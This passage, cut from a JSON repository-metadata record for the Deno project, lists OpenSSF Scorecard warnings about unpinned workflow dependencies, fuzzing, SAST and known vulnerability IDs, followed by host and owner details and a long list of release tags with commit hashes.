https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:67: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/post_publish.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pr.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/pr.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:65: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:73: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:104: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:119: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:125: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:133: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:138: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:155: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/start_release.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/start_release.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/version_bump.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:43: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:38: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: containerImage not pinned by hash: .devcontainer/Dockerfile:1: pin your Docker image by updating mcr.microsoft.com/devcontainers/rust:1 to mcr.microsoft.com/devcontainers/rust:1@sha256:fc57fb865035c5395e85246c8842b071ced6e7cde727b3c98abbcc794eaf4759","Warn: downloadThenRun not pinned by hash: .devcontainer/Dockerfile:10","Info:   0 out of  25 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of  35 third-party GitHubAction dependencies pinned","Info:   0 out of   1 containerImage dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":6,"reason":"4 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-v7pc-74h8-xq2h","Warn: Project is vulnerable to: RUSTSEC-2025-0006","Warn: Project is vulnerable to: RUSTSEC-2024-0436","Warn: Project is vulnerable to: RUSTSEC-2023-0071 / GHSA-4grx-2x9w-596c / GHSA-c38w-74pg-36hr"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T04:23:13.226Z","repository_id":37251508,"created_at":"2025-08-18T04:23:13.226Z","updated_at":"2025-08-18T04:23:13.226Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36827962,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"ssl_error","status_checked_at":"2026-08-22T15:14:58.237Z","response_time":51,"last_error":"SSL_read: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"denoland","name":"Deno","uuid":"42048915","kind":"organization","description":"","email":"support@deno.com","website":"https://deno.land","location":null,"twitter":"deno_land","company":null,"icon_url":"https://avatars.githubusercontent.com/u/42048915?v=4","repositories_count":89,"last_synced_at":"2023-04-09T21:37:02.792Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/denoland","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-02T16:32:27.195Z","updated_at":"2023-04-09T21:37:03.563Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland/repositories"},"tags":[{"name":"v2.9.5","sha":"17fadf33a8df3af9488b9f42efd1f2290d6dc7a3","kind":"commit","published_at":"2026-08-06T11:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5/manifests"},{"name":"v2.9.4","sha":"14eea3160ae5834476aa3b9d317b8d41d991b982","kind":"commit","published_at":"2026-07-23T14:13:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4/manifests"},{"name":"v2.9.3","sha":"f39575ecd50602a5b42b1ba8e93849460de9fcf4","kind":"commit","published_at":"2026-07-15T13:38:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3/manifests"},{"name":"v2.9.2","sha":"356c132ed60e679b34535a287a493193aa8bb6a4","kind":"commit","published_at":"2026-07-08T10:45:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"7afe265234add47e7602f2e91c318f3eff245aa8","kind":"commit","published_at":"2026-07-01T13:28:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"94d375ddd02b7b9eb464781e4bd9e68bf262aacc","kind":"commit","published_at":"2026-06-25T11:49:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0/manifests"},{"name":"v2.8.3","sha":"ba699088698c7b4a2fbea33acc4dcd6571789452","kind":"commit","published_at":"2026-06-11T12:02:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3/manifests"},{"name":"v2.8.2","sha":"085be0b5ff8ca3ccfe58318afe0939c4d4af9743","kind":"commit","published_at":"2026-06-03T11:51:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2/manifests"},{"name":"v2.8.1","sha":"3e2030bc01776ce6b4ca355b1e78c4cb98c82dca","kind":"commit","published_at":"2026-05-27T10:23:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"fbb5be31ac23ef40f51025d6aeaaa91d9f082e4a","kind":"commit","published_at":"2026-05-22T08:06:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0/manifests"},{"name":"v2.7.14","sha":"2d674b25625bcc367853d00fe86f6e84390f88cb","kind":"commit","published_at":"2026-04-28T12:41:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14/manifests"},{"name":"v2.7.13","sha":"eea91269eb83ff8065afe2e424c8fe78c4b1f448","kind":"commit","published_at":"2026-04-22T11:22:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13/manifests"},{"name":"v2.7.12","sha":"825d2647dd0728723623623b6c7b00da7ddad10d","kind":"commit","published_at":"2026-04-09T18:18:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12/manifests"},{"name":"v2.7.11","sha":"6ddbb099662ea78a62af79484ae773cd9058c815","kind":"commit","published_at":"2026-04-01T09:31:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11/manifests"},{"name":"v2.7.10","sha":"fde6c9c11a5ae8e0dc85f8737b34be11d2aaef32","kind":"commit","published_at":"2026-03-31T12:34:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10/manifests"},{"name":"v2.7.9","sha":"f065b072ab052602746b4be8da37ad90e51aee70","kind":"commit","published_at":"2026-03-27T10:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9/manifests"},{"name":"v2.7.8","sha":"c394911f8edc7591de8da65c7b6690bcbc78afc1","kind":"commit","published_at":"2026-03-25T14:14:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8/manifests"},{"name":"v2.7.7","sha":"8fa9085f90849222bd56facddc16ac288c8ee62e","kind":"commit","published_at":"2026-03-19T11:52:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7/manifests"},{"name":"v2.7.6","sha":"ffbaf13c354a6433a66c2335ab16c4567d357be6","kind":"commit","published_at":"2026-03-18T10:27:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6/manifests"},{"name":"v2.7.5","sha":"0238181e8a95be0885da93bbc99997988d07bff0","kind":"commit","published_at":"2026-03-11T09:51:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5/manifests"},{"name":"v2.7.4","sha":"8274bf758236405d50046dbe31beba96b6d3d2f6","kind":"commit","published_at":"2026-03-05T12:10:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4/manifests"},{"name":"v2.7.3","sha":"e78a7fa8d86848a759e6743537cf90013c7160b1","kind":"commit","published_at":"2026-03-04T14:23:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3/manifests"},{"name":"v2.7.2","sha":"83e374686079a2f067115e60ad91ec38f4f6118b","kind":"commit","published_at":"2026-03-03T14:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2/manifests"},{"name":"v2.7.1","sha":"1df618d969894353731981a17784816167ad82fb","kind":"commit","published_at":"2026-02-25T15:42:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"fb4db333c37ec1242a6f80738510d214018fea53","kind":"commit","published_at":"2026-02-25T09:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0/manifests"},{"name":"v2.6.10","sha":"8871ade7aa09eb907a04ee61a427f5ba14c54014","kind":"commit","published_at":"2026-02-17T14:05:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10/manifests"},{"name":"v2.6.9","sha":"7a9888857e01c02417fd38144d4bf0ace73eb6ab","kind":"commit","published_at":"2026-02-10T14:53:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9/manifests"},{"name":"v2.6.8","sha":"7ab62a769be154c0926fe8be640d48674eb79614","kind":"commit","published_at":"2026-02-02T13:42:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8/manifests"},{"name":"v2.6.7","sha":"d155af667f0e57277dc992d1b9609d5e6712908d","kind":"commit","published_at":"2026-01-29T11:26:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7/manifests"},{"name":"v2.5.7","sha":"8533c169419c6c92069cb5981a73ee9c36d19798","kind":"commit","published_at":"2026-01-27T16:21:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7/manifests"},{"name":"v2.6.6","sha":"b9b87a6bfb61a5d8855ee1578620ac3a9393b6bb","kind":"commit","published_at":"2026-01-22T19:37:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6/manifests"},{"name":"v2.6.5","sha":"c356d9a621fccad5047497238039cde10613b278","kind":"commit","published_at":"2026-01-15T11:11:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5/manifests"},{"name":"v2.6.4","sha":"658638b3262a90c3e92fe96887fd898b5b1a78d7","kind":"commit","published_at":"2026-01-05T16:18:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4/manifests"},{"name":"v2.6.3","sha":"3fbb1daddbc9333cddf0d8c0735811717dd70f7a","kind":"commit","published_at":"2025-12-20T11:07:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"9cd8077757a365f2e9e36499c2330d2d4facbb2e","kind":"commit","pu